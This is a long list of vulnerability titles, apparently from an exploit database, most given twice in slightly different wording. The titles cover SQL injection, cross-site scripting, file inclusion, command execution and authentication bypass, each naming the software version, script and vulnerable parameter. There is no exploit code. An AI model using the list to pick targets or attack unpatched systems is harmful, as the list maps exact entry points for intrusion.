'/products/details.asp' 'Product_ID' Parameter SQL Injection Venom Board - Post.php3 Multiple SQL Injection Venom Board - 'Post.php3' Multiple SQL Injections microBlog 2.0 - 'index.php' Multiple SQL Injection microBlog 2.0 - 'index.php' Multiple SQL Injections NewsPHP - 'index.php' Multiple SQL Injection NewsPHP - 'index.php' Multiple SQL Injections ZixForum 1.12 - forum.asp Multiple SQL Injection ZixForum 1.12 - forum.asp Multiple SQL Injections HiveMail 1.2.2/1.3 - addressbook.update.php contactgroupid Variable Arbitrary PHP Command Execution HiveMail 1.2.2/1.3 - folders.update.php folderid Variable Arbitrary PHP Command Execution HiveMail 1.2.2/1.3 - 'addressbook.update.php' 'contactgroupid' Parameter Arbitrary PHP Command Execution HiveMail 1.2.2/1.3 - 'folders.update.php' 'folderid' Parameter Arbitrary PHP Command Execution ImageVue 0.16.1 - readfolder.php path Variable Arbitrary Directory Listing ImageVue 0.16.1 - 'readfolder.php' 'path' Parameter Arbitrary Directory Listing dotProject 2.0 - /modules/projects/gantt.php dPconfig[root_dir] Parameter Remote File Inclusion dotProject 2.0 - /includes/db_connect.php baseDir Remote File Inclusion dotProject 2.0 - /includes/session.php baseDir Parameter Remote File Inclusion dotProject 2.0 - /modules/projects/gantt2.php dPconfig[root_dir] Parameter Remote File Inclusion dotProject 2.0 - /modules/projects/vw_files.php dPconfig[root_dir] Parameter Remote File Inclusion dotProject 2.0 - /modules/admin/vw_usr_roles.php baseDir Parameter Remote File Inclusion dotProject 2.0 - /modules/public/calendar.php baseDir Parameter Remote File Inclusion dotProject 2.0 - /modules/public/date_format.php baseDir Parameter Remote File Inclusion dotProject 2.0 - /modules/tasks/gantt.php baseDir Parameter Remote File Inclusion dotProject 2.0 - '/modules/projects/gantt.php' 'dPconfig[root_dir]' Parameter Remote File Inclusion dotProject 2.0 - '/includes/db_connect.php' 'baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/includes/session.php' 'baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/modules/projects/gantt2.php' 'dPconfig[root_dir]' Parameter Remote File Inclusion dotProject 2.0 - '/modules/projects/vw_files.php' 'dPconfig[root_dir]' Parameter Remote File Inclusion dotProject 2.0 - '/modules/admin/vw_usr_roles.php' 'baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/modules/public/calendar.php' 'baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/modules/public/date_format.php' 'baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/modules/tasks/gantt.php' 'baseDir' Parameter Remote File Inclusion MyBB 1.0.3 - private.php Multiple SQL Injection MyBB 1.0.3 - 'private.php' Multiple SQL Injections Ginkgo CMS - 'index.php rang Parameter' SQL Injection Ginkgo CMS - 'index.php' 'rang' Parameter SQL Injection Telmanik CMS Press 1.01b - 'pages.php page_name Parameter' SQL Injection Telmanik CMS Press 1.01b - 'pages.php' 'page_name' Parameter SQL Injection DCI-Taskeen 1.03 - basket.php Multiple Parameter SQL Injection DCI-Taskeen 1.03 - cat.php Multiple Parameter SQL Injection DCI-Taskeen 1.03 - 'basket.php' Multiple Parameter SQL Injections DCI-Taskeen 1.03 - 'cat.php' Multiple Parameter SQL Injections sBlog 0.7.2 - search.php keyword Variable POST Method Cross-Site Scripting sBlog 0.7.2 - comments_do.php Multiple Variable POST Method Cross-Site Scripting sBlog 0.7.2 - 'search.php' 'keyword' Parameter POST Method Cross-Site Scripting sBlog 0.7.2 - 'comments_do.php' Multiple Variable POST Method Cross-Site Scripting PHPFox 3.6.0 (build3) - Multiple SQL Injection PHPFox 3.6.0 (build3) - Multiple SQL Injections Verisign MPKI 6.0 - Haydn.exe Cross-Site Scripting Verisign MPKI 6.0 - 'Haydn.exe' Cross-Site Scripting DSLogin 1.0 - 'index.php' Multiple SQL Injection DSLogin 1.0 - 'index.php' Multiple SQL Injections MLMAuction Script - 'gallery.php id Parameter' SQL Injection MLMAuction Script - 'gallery.php' 'id' Parameter SQL Injection PHPMyForum 4.0 - 'index.php' type Variable CRLF Injection PHPMyForum 4.0 - 'index.php' 'type' Parameter CRLF Injection APT-webshop 3.0/4.0 - modules.php Multiple SQL Injection APT-webshop 3.0/4.0 - modules.php Multiple SQL Injections Cisco CallManager 3.x/4.x - Web Interface ccmadmin/phonelist.asp pattern Parameter Cross-Site Scripting Cisco CallManager 3.x/4.x - Web Interface ccmuser/logon.asp Cross-Site Scripting Cisco CallManager 3.x/4.x - Web Interface 'ccmadmin/phonelist.asp' Pattern Parameter Cross-Site Scripting Cisco CallManager 3.x/4.x - Web Interface 'ccmuser/logon.asp' Cross-Site Scripting 321soft PHP-Gallery 0.9 - 'index.php' path Variable Arbitrary Directory Listing 321soft PHP-Gallery 0.9 - 'index.php' 'path' Parameter Arbitrary Directory Listing Pacheckbook 1.1 - 'index.php' Multiple SQL Injection Pacheckbook 1.1 - 'index.php' Multiple SQL Injections Creative Software UK Community Portal 1.1 - PollResults.php Multiple Parameter SQL Injection Creative Software UK Community Portal 1.1 - 'PollResults.php' Multiple Parameter SQL Injections EvoTopsite 2.0 - 'index.php' Multiple SQL Injection timobraun Dynamic Galerie 1.0 - 'index.php' pfad Variable Arbitrary Directory Listing timobraun Dynamic Galerie 1.0 - galerie.php pfad Variable Arbitrary Directory Listing EvoTopsite 2.0 - 'index.php' Multiple SQL Injections timobraun Dynamic Galerie 1.0 - 'index.php' 'pfad' Parameter Arbitrary Directory Listing timobraun Dynamic Galerie 1.0 - 'galerie.php' 'pfad' Parameter Arbitrary Directory Listing Gphotos 1.4/1.5 - 'index.php' rep Variable Traversal Arbitrary Directory Listing Gphotos 1.4/1.5 - 'index.php' 'rep' Parameter Traversal Arbitrary Directory Listing Mini-NUKE 2.3 - Your_Account.asp Multiple SQL Injection Mini-NUKE 2.3 - 'Your_Account.asp' Multiple SQL Injections Woltlab Burning Board FLVideo Addon - 'video.php value Parameter' SQL Injection Woltlab Burning Board FLVideo Addon - 'video.php' 'value' Parameter SQL Injection glFusion 1.3.0 - 'search.php cat_id Parameter' SQL Injection glFusion 1.3.0 - 'search.php' 'cat_id' Parameter SQL Injection Geodesic Solutions Multiple Products - 'index.php' b Parameter SQL Injection Geodesic Solutions Multiple Products - 'index.php' 'b' Parameter SQL Injection RadScripts - a_editpage.php Filename Variable Arbitrary File Overwrite RadScripts - 'a_editpage.php' 'Filename' Parameter Arbitrary File Overwrite Banex PHP MySQL Banner Exchange 2.21 - admin.php Multiple Parameter SQL Injection Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple Parameter SQL Injections XennoBB 2.1 - profile.php Multiple SQL Injection XennoBB 2.1 - 'profile.php' Multiple SQL Injections Vtiger CRM 5.4.0 - 'index.php onlyforuser Parameter' SQL Injection Vtiger CRM 5.4.0 - 'index.php' 'onlyforuser' Parameter SQL Injection CubeCart 3.0.x - /admin/print_order.php order_id Parameter Cross-Site Scripting CubeCart 3.0.x - '/admin/print_order.php' 'order_id' Parameter Cross-Site Scripting CubeCart 3.0.x - /admin/nav.php Multiple Parameter Cross-Site Scripting CubeCart 3.0.x - /admin/image.php image Parameter Cross-Site Scripting CubeCart 3.0.x - /admin/header.inc.php Multiple Parameter Cross-Site Scripting CubeCart 3.0.x - /footer.inc.php la_pow_by Parameter Cross-Site Scripting CubeCart 3.0.x - '/admin/nav.php' Multiple Parameter Cross-Site Scripting CubeCart 3.0.x - '/admin/image.php' 'image' Parameter Cross-Site Scripting CubeCart 3.0.x - '/admin/header.inc.php' Multiple Parameter Cross-Site Scripting CubeCart 3.0.x - '/footer.inc.php' 'la_pow_by' Parameter Cross-Site Scripting AckerTodo 4.2 - 'login.php' Multiple SQL Injection AckerTodo 4.2 - 'login.php' Multiple SQL Injections Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php sondage Parameter' SQL Injection Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php' 'sondage' Parameter SQL Injection INFINICART - browsesubcat.asp Multiple Parameter SQL Injection INFINICART - 'browsesubcat.asp' Multiple Parameter SQL Injection Car Site Manager - csm/asp/listings.asp Multiple Parameter SQL Injection Car Site Manager - 'csm/asp/listings.asp' Multiple Parameter SQL Injections Dragon Internet Events Listing 2.0.01 - admin_login.asp Multiple Field SQL Injection ASPIntranet 2.1 - Multiple SQL Injection Dragon Internet Events Listing 2.0.01 - 'admin_login.asp' Multiple Field SQL Injections ASPIntranet 2.1 - Multiple SQL Injections Image Gallery with Access Database - default.asp Multiple Parameter SQL Injection Image Gallery with Access Database - 'default.asp' Multiple Parameter SQL Injection 20/20 Applications Data Shed 1.0 - listings.asp Multiple Parameter SQL Injection 20/20 Applications Data Shed 1.0 - 'listings.asp' Multiple Parameter SQL Injections BestWebApp Dating Site Login Component - Multiple Field SQL Injection BestWebApp Dating Site Login Component - Multiple Field SQL Injections Enthrallweb eClassifieds - ad.asp Multiple Parameter SQL Injection Enthrallweb eClassifieds - 'ad.asp' Multiple Parameter SQL Injection BirdBlog 1.4 - /admin/admincore.php msg Parameter Cross-Site Scripting BirdBlog 1.4 - /admin/comments.php month Parameter Cross-Site Scripting BirdBlog 1.4 - /admin/entries.php month Parameter Cross-Site Scripting BirdBlog 1.4 - /admin/logs.php page Parameter Cross-Site Scripting BirdBlog 1.4 - '/admin/admincore.php' 'msg' Parameter Cross-Site Scripting BirdBlog 1.4 - '/admin/comments.php' 'month' Parameter Cross-Site Scripting BirdBlog 1.4 - '/admin/entries.php' 'month' Parameter Cross-Site Scripting BirdBlog 1.4 - '/admin/logs.php' 'page' Parameter Cross-Site Scripting Grandora Rialto 1.6 - /admin/default.asp Multiple Field SQL Injection Grandora Rialto 1.6 - '/admin/default.asp' Multiple Field SQL Injection Grandora Rialto 1.6 - searchkey.asp Multiple Parameter SQL Injection Grandora Rialto 1.6 - searchmain.asp Multiple Parameter SQL Injection Grandora Rialto 1.6 - searchoption.asp Multiple Parameter SQL Injection Grandora Rialto 1.6 - 'searchkey.asp' Multiple Parameter SQL Injection Grandora Rialto 1.6 - 'searchmain.asp' Multiple Parameter SQL Injection Grandora Rialto 1.6 - 'searchoption.asp' Multiple Parameter SQL Injection Enthrallweb eHomes - compareHomes.asp Multiple Parameter SQL Injection Enthrallweb eHomes - result.asp Multiple Parameter SQL Injection Enthrallweb eHomes - 'compareHomes.asp' Multiple Parameter SQL Injection Enthrallweb eHomes - 'result.asp' Multiple Parameter SQL Injection DUdownload 1.0/1.1 - detail.asp Multiple Parameter SQL Injection DUdownload 1.0/1.1 - 'detail.asp' Multiple Parameter SQL Injections Aspee Ziyaretci Defteri - giris.asp Multiple Field SQL Injection Aspee Ziyaretci Defteri - giris.asp Multiple Field SQL Injections ClickContact - default.asp Multiple SQL Injection ClickContact - 'default.asp' Multiple SQL Injections Dol Storye - Dettaglio.asp Multiple SQL Injection Dol Storye - 'Dettaglio.asp' Multiple SQL Injections Efkan Forum 1.0 - Grup Variable SQL Injection Efkan Forum 1.0 - 'Grup' Parameter SQL Injection EditTag 1.2 - edittag.cgi file Variable Arbitrary File Disclosure EditTag 1.2 - edittag.pl file Variable Arbitrary File Disclosure EditTag 1.2 - edittag_mp.cgi file Variable Arbitrary File Disclosure EditTag 1.2 - edittag_mp.pl file Variable Arbitrary File Disclosure EditTag 1.2 - 'edittag.cgi' 'file' Parameter Arbitrary File Disclosure EditTag 1.2 - 'edittag.pl' 'file' Parameter Arbitrary File Disclosure EditTag 1.2 - 'edittag_mp.cgi' 'file' Parameter Arbitrary File Disclosure EditTag 1.2 - 'edittag_mp.pl' 'file' Parameter Arbitrary File Disclosure Indexu 5.0/5.3 - mailing_list.php Multiple Variables Cross-Site Scripting Indexu 5.0/5.3 - 'mailing_list.php' Multiple Parameters Cross-Site Scripting Project'Or RIA 3.4.0 - 'objectDetail.php objectId Parameter' SQL Injection Project'Or RIA 3.4.0 - 'objectDetail.php' 'objectId' Parameter SQL Injection WordPress 2.1.1 - 'wp-includes/theme.php' iz Variable Arbitrary Command Execution Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php' 's' Variable SQL Injection WordPress 2.1.1 - 'wp-includes/theme.php' 'iz' Parameter Arbitrary Command Execution Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php' 's' Parameter SQL Injection aBitWhizzy - whizzylink.php d Variable Traversal Arbitrary Directory Listing aBitWhizzy - 'whizzylink.php' 'd' Parameter Traversal Arbitrary Directory Listing MyBloggie 2.1.x - 'index.php' Multiple SQL Injection MyBloggie 2.1.x - 'index.php' Multiple SQL Injections PHPLive! 3.2.2 - super/info.php BASE_URL Variable Parameter Cross-Site Scripting PHPLive! 3.2.2 - 'super/info.php' 'BASE_URL' Parameter Parameter Cross-Site Scripting JFFNms 0.8.3 - auth.php Multiple Parameter SQL Injection JFFNms 0.8.3 - 'auth.php' Multiple Parameter SQL Injection DotClear 1.2.x - /ecrire/trackback.php post_id Parameter Cross-Site Scripting DotClear 1.2.x - /tools/thememng/index.php tool_url Parameter Cross-Site Scripting DotClear 1.2.x - '/ecrire/trackback.php' 'post_id' Parameter Cross-Site Scripting DotClear 1.2.x - '/tools/thememng/index.php' 'tool_url' Parameter Cross-Site Scripting PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injection PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injections Exponent CMS 0.96.5/0.96.6 - iconspopup.php icodir Variable Traversal Arbitrary Directory Listing Exponent CMS 0.96.5/0.96.6 - 'iconspopup.php' 'icodir' Parameter Traversal Arbitrary Directory Listing Phorum 5.1.20 - admin.php module[] Variable Full Path Disclosure Phorum 5.1.20 - 'admin.php' 'module[]' Parameter Full Path Disclosure Chamilo Lms 1.9.6 - 'profile.php password0 Parameter' SQL Injection Dokeos 2.2 RC2 - 'index.php language Parameter' SQL Injection Chamilo Lms 1.9.6 - 'profile.php' 'password0 Parameter SQL Injection Dokeos 2.2 RC2 - 'index.php' 'language' Parameter SQL Injection UebiMiau 2.7.10 - 'demo/pop3/error.php' Multiple Variable Full Path Disclosure UebiMiau 2.7.10 - 'demo/pop3/error.php' Multiple Parameters Full Path Disclosure PHPAccounts 0.5 - 'index.php' Multiple SQL Injection PHPAccounts 0.5 - 'index.php' Multiple SQL Injections NetFlow Analyzer 5 - /jspui/applicationList.jsp alpha Parameter Cross-Site Scripting NetFlow Analyzer 5 - /jspui/appConfig.jsp task Parameter Cross-Site Scripting NetFlow Analyzer 5 - '/jspui/applicationList.jsp' 'alpha' Parameter Cross-Site Scripting NetFlow Analyzer 5 - '/jspui/appConfig.jsp' 'task' Parameter Cross-Site Scripting NetFlow Analyzer 5 - /jspui/selectDevice.jsp rtype Parameter Cross-Site Scripting NetFlow Analyzer 5 - /jspui/customReport.jsp rtype Parameter Cross-Site Scripting NetFlow Analyzer 5 - '/jspui/selectDevice.jsp' 'rtype' Parameter Cross-Site Scripting NetFlow Analyzer 5 - '/jspui/customReport.jsp' 'rtype' Parameter Cross-Site Scripting geoBlog MOD_1.0 - deletecomment.php id Variable Arbitrary Comment Deletion geoBlog MOD_1.0 - deleteblog.php id Variable Arbitrary Blog Deletion geoBlog MOD_1.0 - 'deletecomment.php' 'id' Parameter Arbitrary Comment Deletion geoBlog MOD_1.0 - 'deleteblog.php' 'id' Parameter Arbitrary Blog Deletion Next Gen Portfolio Manager - default.asp Multiple SQL Injection Next Gen Portfolio Manager - 'default.asp' Multiple SQL Injections ACG News 1.0 - 'index.php' Multiple SQL Injection Cisco CallManager 4.2 - / CUCM 4.2 Logon Page lang Parameter SQL Injection ACG News 1.0 - 'index.php' Multiple SQL Injections Cisco CallManager 4.2 / CUCM 4.2 - Logon Page 'lang' Parameter SQL Injection WebBatch - webbatch.exe URL Cross-Site Scripting WebBatch - webbatch.exe dumpinputdata Variable Remote Information Disclosure WebBatch - 'webbatch.exe' URL Cross-Site Scripting WebBatch - 'webbatch.exe' 'dumpinputdata' Parameter Remote Information Disclosure NetWin DNews - Dnewsweb.exe Multiple Cross-Site Scripting Vulnerabilities NetWin DNews - 'Dnewsweb.exe' Multiple Cross-Site Scripting Vulnerabilities Scott Manktelow Design Stride 1.0 - Courses detail.php Multiple SQL Injection Scott Manktelow Design Stride 1.0 Courses - 'detail.php' Multiple SQL Injections Article Dashboard - 'admin/login.php' Multiple SQL Injection Article Dashboard - 'admin/login.php' Multiple SQL Injections Multi-Forums - Directory.php Multiple SQL Injection Multi-Forums - 'Directory.php' Multiple SQL Injections JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injection JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injections Absolute News Manager .NET 5.1 - 'pages/default.aspx' template Variable Remote File Access Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx' Multiple Parameter SQL Injection Absolute News Manager .NET 5.1 - 'pages/default.aspx' 'template' Parameter Remote File Access Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx' Multiple Parameter SQL Injections phpRPG 0.8 - /tmp Directory PHPSESSID Cookie Session Hijacking phpRPG 0.8 - '/tmp' Directory PHPSESSID Cookie Session Hijacking Web Sihirbazi 5.1.1 - 'default.asp' Multiple SQL Injection Web Sihirbazi 5.1.1 - 'default.asp' Multiple SQL Injections eTicket 1.5.5.2 - search.php Multiple Parameter SQL Injection eTicket 1.5.5.2 - admin.php Multiple Parameter SQL Injection eTicket 1.5.5.2 - 'search.php' Multiple Parameter SQL Injection eTicket 1.5.5.2 - 'admin.php' Multiple Parameter SQL Injection Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/login.jsp Multiple Parameter Cross-Site Scripting Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/account/findForSelect.jsp resultsForm Parameter Cross-Site Scripting Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/help/index.jsp helpUrl Variable Remote Frame Injection Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/user/main.jsp activeControl Parameter Cross-Site Scripting Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/login.jsp' Multiple Parameter Cross-Site Scripting Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/account/findForSelect.jsp' 'resultsForm' Parameter Cross-Site Scripting Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/help/index.jsp' 'helpUrl' Parameter Remote Frame Injection Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/user/main.jsp' 'activeControl' Parameter Cross-Site Scripting MyBB 1.2.10 - 'moderation.php' Multiple SQL Injection MyBB 1.2.10 - 'moderation.php' Multiple SQL Injections PacerCMS 0.6 - 'id' Parameter Multiple SQL Injection PacerCMS 0.6 - 'id' Parameter Multiple SQL Injections Ipswitch WS_FTP Server 6 - /WSFTPSVR/FTPLogServer/LogViewer.asp Authentication Bypass Ipswitch WS_FTP Server 6 - '/WSFTPSVR/FTPLogServer/LogViewer.asp' Authentication Bypass Cacti 0.8.7 - tree.php Multiple Parameter SQL Injection Cacti 0.8.7 - 'tree.php' Multiple Parameter SQL Injections Site2Nite Real Estate Web - 'agentlist.asp' Multiple SQL Injection Site2Nite Real Estate Web - 'agentlist.asp' Multiple SQL Injections WebcamXP 3.72.440/4.05.280 Beta - /pocketpc camnum Variable Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 Beta - /show_gallery_pic id Variable Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 Beta - '/pocketpc' 'camnum' Parameter Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 Beta - '/show_gallery_pic' 'id' Parameter Arbitrary Memory Disclosure Elastic Path 4.1 - 'manager/FileManager.jsp' dir Variable Traversal Arbitrary Directory Listing Elastic Path 4.1 - 'manager/FileManager.jsp' 'dir' Parameter Traversal Arbitrary Directory Listing osCommerce 2.3.3.4 - 'geo_zones.php zID Parameter' SQL Injection osCommerce 2.3.3.4 - 'geo_zones.php' 'zID' Parameter SQL Injection D-Link DSL-2750B (ADSL Router) - Cross-Site Request Forgery D-Link DSL-2750B ADSL Route) - Cross-Site Request Forgery Netgear DGN2200 N300 Wireless Router - Multiple Vulnerabilities NETGEAR DGN2200 N300 Wireless Router - Multiple Vulnerabilities Concrete5 5.6.2.1 - 'index.php cID Parameter' SQL Injection Concrete5 5.6.2.1 - 'index.php' 'cID' Parameter SQL Injection TLM CMS 1.1 - 'index.php' Multiple SQL Injection TLM CMS 1.1 - 'index.php' Multiple SQL Injections RunCMS 1.6.1 - 'pm.class.php' Multiple SQL Injection RunCMS 1.6.1 - 'pm.class.php' Multiple SQL Injections IBD Micro CMS 3.5 - 'microcms-admin-login.php' Multiple SQL Injection IBD Micro CMS 3.5 - 'microcms-admin-login.php' Multiple SQL Injections WordPress Plugin AdRotate 3.9.4 - 'clicktracker.php track Parameter' SQL Injection WordPress Plugin AdRotate 3.9.4 - 'clicktracker.php' 'track' Parameter SQL Injection JustPORTAL 1.0 - 'site' Parameter Multiple SQL Injection Proje ASP Portal 2.0 - 'id' Parameter Multiple SQL Injection dvbbs 8.2 - 'login.asp' Multiple SQL Injection JustPORTAL 1.0 - 'site' Parameter Multiple SQL Injections Proje ASP Portal 2.0 - 'id' Parameter Multiple SQL Injections dvbbs 8.2 - 'login.asp' Multiple SQL Injections Te Ecard - 'id' Parameter Multiple SQL Injection Te Ecard - 'id' Parameter Multiple SQL Injections Benja CMS 0.1 - /admin/admin_edit_submenu.php URL Cross-Site Scripting Benja CMS 0.1 - '/admin/admin_edit_submenu.php' URL Cross-Site Scripting Benja CMS 0.1 - /admin/admin_edit_topmenu.php URL Cross-Site Scripting Benja CMS 0.1 - '/admin/admin_edit_topmenu.php' URL Cross-Site Scripting PHP Ticket System Beta 1 - 'get_all_created_by_user.php id Parameter' SQL Injection PHP Ticket System Beta 1 - 'get_all_created_by_user.php' 'id' Parameter SQL Injection webERP 4.11.3 - 'SalesInquiry.php SortBy Parameter' SQL Injection webERP 4.11.3 - 'SalesInquiry.php' 'SortBy' Parameter SQL Injection couponPHP CMS 1.0 - Multiple Persistent Cross-Site Scripting / SQL Injection couponPHP CMS 1.0 - Multiple Persistent Cross-Site Scripting / SQL Injections Claroline 1.8.9 - claroline/redirector.php url Variable Arbitrary Site Redirect Claroline 1.8.9 - 'claroline/redirector.php' 'url' Parameter Arbitrary Site Redirect EasyPublish 3.0 - 'read' Parameter Multiple SQL Injection / Cross-Site Scripting EasyPublish 3.0 - 'read' Parameter Multiple SQL Injections / Cross-Site Scripting ownCloud 4.0.x/4.5.x - 'upload.php Filename Parameter' Remote Code Execution ownCloud 4.0.x/4.5.x - 'upload.php' 'Filename' Parameter Remote Code Execution Battle.net Clan Script 1.5.x - 'index.php' Multiple SQL Injection Battle.net Clan Script 1.5.x - 'index.php' Multiple SQL Injections ZYXEL Router P-660HN-T1A - Login Bypass ZYXEL P-660HN-T1A Router - Login Bypass PromoProducts - 'view_product.php' Multiple SQL Injection PromoProducts - 'view_product.php' Multiple SQL Injections EasyRealtorPRO 2008 - 'site_search.php' Multiple SQL Injection EasyRealtorPRO 2008 - 'site_search.php' Multiple SQL Injections OpenCart 1.5.6.1 - 'openbay' Multiple SQL Injection OpenCart 1.5.6.1 - 'openbay' Multiple SQL Injections InterWorx Control Panel 5.0.13 build 574 - 'xhr.php i Parameter' SQL Injection InterWorx Control Panel 5.0.13 build 574 - 'xhr.php' 'i' Parameter SQL Injection Tandis CMS 2.5 - 'index.php' Multiple SQL Injection Tandis CMS 2.5 - 'index.php' Multiple SQL Injections TWiki 4.x - SEARCH Variable Remote Command Execution TWiki 4.x - URLPARAM Variable Cross-Site Scripting TWiki 4.x - 'SEARCH' Parameter Remote Command Execution TWiki 4.x - 'URLPARAM' Parameter Cross-Site Scripting DO-CMS 3.0 - 'p' Parameter Multiple SQL Injection DO-CMS 3.0 - 'p' Parameter Multiple SQL Injections MKPortal 1.2.1 - /modules/blog/index.php Home Template Textarea SQL Injection MKPortal 1.2.1 - /modules/rss/handler_image.php i Parameter Cross-Site Scripting MKPortal 1.2.1 - '/modules/blog/index.php' Home Template Textarea SQL Injection MKPortal 1.2.1 - '/modules/rss/handler_image.php' 'i' Parameter Cross-Site Scripting Banking@Home 2.1 - 'login.asp' Multiple SQL Injection Banking@Home 2.1 - 'login.asp' Multiple SQL Injections kitForm CRM Extension 0.43 - 'sorter.php sorter_value Parameter' SQL Injection kitForm CRM Extension 0.43 - 'sorter.ph' 'sorter_value' Parameter SQL Injection dompdf 0.6.0 - 'dompdf.php read Parameter' Arbitrary File Read dompdf 0.6.0 - 'dompdf.php' 'read' Parameter Arbitrary File Read Multiple JiRo's Products - 'files/login.asp' Multiple SQL Injection Multiple JiRo's Products - 'files/login.asp' Multiple SQL Injections VisualShapers EZContents 2.0.3 - Authentication Bypass / Multiple SQL Injection VisualShapers EZContents 2.0.3 - Authentication Bypass / Multiple SQL Injections Pars CMS - 'RP' Parameter Multiple SQL Injection Pars CMS - 'RP' Parameter Multiple SQL Injections tenfourzero.net Shutter 0.1.4 - 'admin.html' Multiple SQL Injection tenfourzero.net Shutter 0.1.4 - 'admin.html' Multiple SQL Injections MODx 1.0.3 - 'index.php' Multiple SQL Injection MODx 1.0.3 - 'index.php' Multiple SQL Injections HuronCMS - 'index.php' Multiple SQL Injection HuronCMS - 'index.php' Multiple SQL Injections 4x CMS - 'login.php' Multiple SQL Injection 4x CMS - 'login.php' Multiple SQL Injections Affiliate Store Builder - 'edit_cms.php' Multiple SQL Injection Affiliate Store Builder - 'edit_cms.php' Multiple SQL Injections ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injection ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injections GREEZLE - Global Real Estate Agent Login Multiple SQL Injection (GREEZLE) Global Real Estate Agent Login - Multiple SQL Injections SaffaTunes CMS - 'news.php' Multiple SQL Injection SaffaTunes CMS - 'news.php' Multiple SQL Injections pragmaMX 0.1.11 - 'modules.php' Multiple SQL Injection pragmaMX 0.1.11 - 'modules.php' Multiple SQL Injections DiamondList - /user/main/update_settings setting[site_title] Parameter Cross-Site Scripting DiamondList - /user/main/update_category category[description] Parameter Cross-Site Scripting DiamondList - '/user/main/update_settings' 'setting[site_title]' Parameter Cross-Site Scripting DiamondList - '/user/main/update_category' 'category[description]' Parameter Cross-Site Scripting vBulletin 4.0.x < 4.1.2 - 'search.php cat Parameter' SQL Injection vBulletin 4.0.x < 4.1.2 - 'search.php' 'cat' Parameter SQL Injection Mulitple WordPress Themes - 'admin-ajax.php img Parameter' Arbitrary File Download Mulitple WordPress Themes - 'admin-ajax.php' 'img' Parameter Arbitrary File Download tourismscripts HotelBook - 'hotel_id' Parameter Multiple SQL Injection tourismscripts HotelBook - 'hotel_id' Parameter Multiple SQL Injections APBook 1.3 - Admin Login Multiple SQL Injection APBook 1.3 - Admin Login Multiple SQL Injections MODx manager - /controllers/default/resource/tvs.php class_key Parameter Traversal Local File Inclusion MODx manager - '/controllers/default/resource/tvs.php' 'class_key' Parameter Traversal Local File Inclusion Bacula-Web 5.2.10 - 'joblogs.php jobid Parameter' SQL Injection Bacula-Web 5.2.10 - 'joblogs.php' 'jobid Parameter SQL Injection PHP Scripts Now Riddles - /riddles/results.php searchQuery Parameter Cross-Site Scripting PHP Scripts Now Riddles - /riddles/list.php catid Parameter SQL Injection PHP Scripts Now Riddles - '/riddles/results.php' 'searchQuery' Parameter Cross-Site Scripting PHP Scripts Now Riddles - '/riddles/list.php' 'catid' Parameter SQL Injection Easy Banner 2009.05.18 - member.php Multiple Parameter SQL Injection Authentication Bypass Easy Banner 2009.05.18 - 'member.php' Multiple Parameter SQL Injection / Authentication Bypass E-lokaler CMS 2 - Admin Login Multiple SQL Injection E-lokaler CMS 2 - Admin Login Multiple SQL Injections Blog:CMS 4.2.1 e - Multiple HTML Injection / Cross-Site Scripting Blog:CMS 4.2.1 e - Multiple HTML Injections / Cross-Site Scripting Piwigo 2.6.0 - 'picture.php rate Parameter' SQL Injection Piwigo 2.6.0 - 'picture.php' 'rate' Parameter SQL Injection Eleanor CMS - Cross-Site Scripting / Multiple SQL Injection Eleanor CMS - Cross-Site Scripting / Multiple SQL Injections Netgear WNR500 Wireless Router - Parameter Traversal Arbitrary File Access Exploit NETGEAR WNR500 Wireless Router - Parameter Traversal Arbitrary File Access Exploit PHPMyRecipes 1.2.2 - 'dosearch.php words_exact Parameter' SQL Injection PHPMyRecipes 1.2.2 - 'dosearch.php' 'words_exact Parameter SQL Injection Cosmoshop 10.05.00 - Multiple Cross-Site Scripting / SQL Injection Cosmoshop 10.05.00 - Multiple Cross-Site Scripting / SQL Injections BoutikOne - search.php Multiple Parameter SQL Injection BoutikOne - 'search.php' Multiple Parameter SQL Injections Ripe Website Manager 1.1 - Cross-Site Scripting / Multiple SQL Injection Ripe Website Manager 1.1 - Cross-Site Scripting / Multiple SQL Injections Cisco Unified Communications Manager 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injection Cisco Unified Communications Manager 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injections Cetera eCommerce - Multiple Cross-Site Scripting / SQL Injection Cetera eCommerce - Multiple Cross-Site Scripting / SQL Injections GuppY 4.6.14 - 'lng' Parameter Multiple SQL Injection GuppY 4.6.14 - 'lng' Parameter Multiple SQL Injections Soitec SmartEnergy 1.4 - SCADA Login SQL Injection Authentication Bypass Soitec SmartEnergy 1.4 - SCADA Login SQL Injection / Authentication Bypass CIK Telecom VoIP router SVG6000RW - Privilege Escalation / Command Execution CIK Telecom VoIP Router SVG6000RW - Privilege Escalation / Command Execution PHPMyRecipes 1.2.2 - 'browse.php category Parameter' SQL Injection PHPMyRecipes 1.2.2 - 'browse.php' 'category' Parameter SQL Injection 4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injection 4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injections TCExam 11.1.29 - 'tce_xml_user_results.php' 